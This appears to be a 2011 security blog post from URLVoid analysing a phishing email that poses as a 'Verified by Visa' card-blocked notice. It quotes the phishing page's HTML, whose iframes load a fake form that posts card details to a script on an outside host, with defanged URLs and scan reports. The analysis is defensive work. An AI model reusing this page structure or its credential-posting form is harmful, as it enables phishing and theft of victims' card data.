URLVoid Blog

An user has reported us a suspicious email:

Headers:

Received: from sds-16.hosteur.com (sds-16.hosteur.com [217.16.9.166])
Received: from www-data by sds-16.hosteur.com with local (Exim 4.69)
Subject: URGENT - Your bank card has been blocked
From: Banking Service <bankservice@service.fr >
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: www-data <www-data@hosteur.com>

The clickable link “Access to your form” redirects to a new (suspicious) URL:

hxxp://servicevbv.us. tf/

URLVoid report:
http://www.urlvoid.com/scan/servicevbv.us.tf

Report 2011-04-07 16:38:44 (GMT 1)
Website servicevbv.us.tf
Domain Hash 91fa19172a89f4c10b8dc0ca8b0460ec
IP Address 188.40.70.27
IP Hostname static.27.70.40.188.clients.your-server.de
IP Country DE (Germany)
AS Number 24940
AS Name HETZNER-AS Hetzner Online AG RZ
Detections 2 / 22 (9 %)
Status SUSPICIOUS

Analyzing the URL content, we can see suspicious code:

<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://www.adboost.com/index6.php" frameborder="0" width="486px" height="60px" ></iframe>
<iframe src="hxxp://krystalweb.co.uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php" name="fid1" id="fid1" width="100%" height="100%" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<a href="servicevbv.us.tf">service verified by visa</a>

Why suspicious ?

1) The page title looks like a scam
2) Why CSS style is located in the directory “/zzz/css.css” ?
3) Why Google Analytics (?) code is located in the directory “/zzz/gas.js” ?
4) Why there is an iframe related to adboost. com/index6.php ?
5) Why there is another iframe realted to (long URL) krystalweb. co. uk ?
6) Where is SSL ?

The long URL:

hxxp://krystalweb.co. uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php

Loads the fake form where an user should insert his details. The form will then send (POST) the details to another script that is located in another (suspicious) URL:

action="hxxp://shopkasa.com. br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>

URLVoid analysis:
http://www.urlvoid.com/scan/shopkasa.com.br

Posted by admin on Thursday, April 7th, 2011 at 4:20 pm and filed under Security with tags phishing, spam. You can skip to the end and leave a response. Pinging is currently not allowed.